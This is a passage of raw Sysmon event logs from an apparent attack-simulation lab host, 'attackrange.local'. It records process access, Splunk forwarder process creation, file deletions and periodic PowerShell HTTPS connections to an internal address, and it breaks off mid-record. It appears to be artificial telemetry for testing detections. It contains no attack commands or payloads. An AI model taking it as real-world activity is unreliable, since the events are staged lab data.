10341000x800000000000000035342101Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:04.692{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342100Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:04.692{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-727C-613B-28B4-03000000C801}6516C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342099Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:04.692{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-727C-613B-28B4-03000000C801}6516C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342098Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:04.677{B81B27B7-727C-613B-28B4-03000000C801}6516C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035342097Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:04.342{B81B27B7-727C-613B-27B4-03000000C801}19601464C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342096Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:04.105{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-727C-613B-27B4-03000000C801}1960C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342095Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:04.105{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342094Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:04.105{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342093Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:04.105{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342092Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:04.105{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342091Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:04.105{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-727C-613B-27B4-03000000C801}1960C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342090Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:04.105{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-727C-613B-27B4-03000000C801}1960C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342089Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:04.090{B81B27B7-727C-613B-27B4-03000000C801}1960C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035342111Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:05.929{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1967C511FFC1185B9F24B6CE634F550A,SHA256=5B7B78898C2ABA3217CAC90517C3B00CC4116C122E2E4240AE533290C2544BBA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342110Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:31.072{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52384-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342109Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:05.096{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BBC13211A091636E55A3DF2DAAEB701C,SHA256=2354834AA2FE3768DF760661C6492E31374D1E82C5D883E0BDF45E2EC0F9B3F0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342108Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:05.096{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D7BAFE97523DEFE503A5E0C1ECE68E24,SHA256=05BA36E02FD0BE292F2F86AADC3A936722FDDA559BB2333C4E2E83080FAF6CA4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342107Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:05.080{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8A7166A16A852BBE69AAC6FACC1FA811,SHA256=56C186BBA1C8D8C06C29BFE466218E428A6F7B667F61B874C87D7E0152B34E79,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342112Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:06.931{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3B3E76EE60B5F88F3A9066904B127EF,SHA256=0C41927EA67553CDFF6B9320A919DFF28195241A365288EE794C695A483441B4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342113Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:07.935{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6AC0FEBEE8B0378874BE7BA2DB2EF53B,SHA256=1602489A35A8AEDED3604030804A98950368EC32657BD316591BC48738A7C459,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342114Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:08.981{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57C273BB23A1B0CF62E9EBC710B9E3EF,SHA256=EBC3FD9886458364B6D89D78E3E62F715D20A9EE7EDBE7ABD9C58747924C4146,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342116Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:09.984{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13C75A12C267AD708D84D38ED136F8B2,SHA256=4EA068D70EF2147A8B44E939EDD079C8D6FEA88ED3BAEDEFF502464463E3A789,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342115Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:34.050{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52385-false10.0.1.12-8000- 354300x800000000000000035342119Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:37.098{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52386-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342118Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:11.333{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CAF3C68472850C5BA93AB2B98158090D,SHA256=7C9591ECFB90F350262B0D7E2585D3872E11D3AFE1FA790533B6FF2520D22601,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342117Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:11.014{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A25FECD9E1CFC19DBA3ED19D34472840,SHA256=B32F8B82BAEED1D9DDBAB1DA5CC27BFA52389CB2823F7B180F20589D7829A42C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342120Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:12.033{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=354DC8275AF3E14E7A70459851B4C8E3,SHA256=9E5495748229E51980D2D934ED7B7A7E4B05502FD0C637171A473DFE96D4C04E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342122Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:39.112{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52387-false10.0.1.12-8000- 23542300x800000000000000035342121Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:13.066{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47144914AE1218AA9789F2CBB995F4C6,SHA256=CDE9DB5CFD427B8040E5172AC8EF10E16CBAA708D4D68409AD642878F696F37D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342123Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:14.081{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD4647787D949EDEC400961ADD2B5AA7,SHA256=4435031EA2155DF7E6D1B044018312B138F79C779696AE40BFE07505F8D9AC13,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342124Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:15.086{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95F6FC709BCC7C6328ECDBAA05286CEF,SHA256=AA2EE3D21D7A5D72D92B6DC3C53C3E6EA7F8E00E410B91A983A1F2F1CEE7D5E8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342127Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:42.100{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52388-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342126Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:16.336{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F2F9EED07766E50DD22E3C697660281F,SHA256=121E621F5A9681EBAD4551095170022777903FA8D203EDDC68B731B29F2BC4F7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342125Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:16.101{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF81DB0C75ED5D1DADF709A9E44C9E4D,SHA256=20B30DCC46B5F822F97041F79A85C53ED997EEC1CC59E38E72E7DE468D54FB71,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342136Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:17.383{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7289-613B-29B4-03000000C801}4780C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342135Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:17.383{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342134Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:17.383{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342133Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:17.383{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342132Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 